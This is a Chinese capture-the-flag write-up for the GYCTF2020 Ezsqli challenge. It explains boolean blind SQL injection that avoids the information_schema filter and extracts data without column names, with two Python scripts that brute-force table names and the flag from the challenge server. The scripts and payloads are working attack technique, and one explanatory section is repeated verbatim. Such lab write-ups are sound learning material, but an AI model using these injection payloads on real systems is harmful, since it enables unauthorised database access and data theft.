# [GYCTF2020] Ezsqli (无列名注入)
过滤了很多,过滤了 information,应该考虑盲注了,1,2,3 都试了一遍
就是二的时候才有是否的回显,但是不是字符串注入,不要用引号(没想到)
直接 2 || 1=1# 当 || 后面条件为真时返回 Nu1L,为假时返回 V&N,这就是判断盲注语句是否成立的关键
接下来就可以写脚本判断表名了
import requests | |
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' | |
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))={}' | |
result = '' | |
for j in range(1,500): | |
for i in range(32, 127): | |
py = payload.format(j,i) | |
post_data = {'id': py} | |
re = requests.post(url, data=post_data) | |
if 'Nu1L' in re.text: | |
result += chr(i) | |
print(result) | |
break |
获取表名
# 知识点:ascii 位偏移
关于 ascii 偏移的利用:
可以看到比较两个字符串的大小与字符串的长度是没有关系的,给定两个字符串,会各取两个字符串的首字符 ascii 码来比较,不等式成立返回 1,不等式不成立返回 0,换一个角度来说,只会比较一次,也就是首字符
这道题我们利用的就是这个特性,我们首先会从构造一个 ascii 从 32 到 128 的循环,与 flag 字符一一对比,满足条件返回 Nu1L,输出符合条件的 ascii 对应的字符,也就是找到了 flag 的第一个字符,以此类推,直到输出所有的 flag
import requests | |
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' | |
def add(flag): | |
res = '' | |
res += flag | |
return res | |
flag = '' | |
for i in range(1,200): | |
for char in range(32, 127): | |
hexchar = add(flag + chr(char)) | |
payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar) | |
#print(payload) | |
data = {'id':payload} | |
r = requests.post(url=url, data=data) | |
text = r.text | |
if 'Nu1L' in r.text: | |
flag += chr(char-1) | |
print(flag) | |
break |
# 有三个需要注意的点
第一个
注意这里的 chr (char-1),我们在本地测试来看一下为什么
当我们匹配 flag 的时候,一定会先经过匹配到字符相等的情况,这一这个时候返回的是 0,对应题目中的 V&N,很明显此时的 chr (char) 并不是我们想要的,我们在输出 1 (Nu1L) 的时候,匹配的是 f 的下一个字符 g,而我们想要的是 f,此时 chr (char-1)=‘f’,所以这里要用 chr (char-1)
第二个
注意循环那里
这里循环的上限一定要大于等于 127,
这里} 的 ascii 是 125,如果取 126 的话,for 循环取到的 i 的最大值是 125,别忘了我们进行了 chr (char-1) 的操作也就是说最大匹配到 ascii 为 124 的字符,不能匹配到},所以这里要扩大上限 (其实也没有关系,flag 都出来了,自己加上一个} 大家也肯定会这么做的,注意这个点就可以了)
第三个
关于 payload 中的
(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)
这里的字段数一定是一一匹配,这里 f1ag_1s_h3r3_hhhhh 是有两个字段的 (可以用 select 1|select 1,2|select 1,2,3 试试就好),知道是两个字段后,还要注意字段内的一一对应,f1ag_1s_h3r3_hhhhh 表中的 flag 在第二个字段
这样 "{}" 与 flag 就实现了对应 (f1ag_1s_h3r3_hhhhh 表的第一个字段可能是 id 啥的,跟咱们没有关系了)
第三个
关于 payload 中的
(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)
这里的字段数一定是一一匹配,这里 f1ag_1s_h3r3_hhhhh 是有两个字段的 (可以用 select 1|select 1,2|select 1,2,3 试试就好),知道是两个字段后,还要注意字段内的一一对应,f1ag_1s_h3r3_hhhhh 表中的 flag 在第二个字段
这样 "{}" 与 flag 就实现了对应 (f1ag_1s_h3r3_hhhhh 表的第一个字段可能是 id 啥的,跟咱们没有关系了)
再改一下‘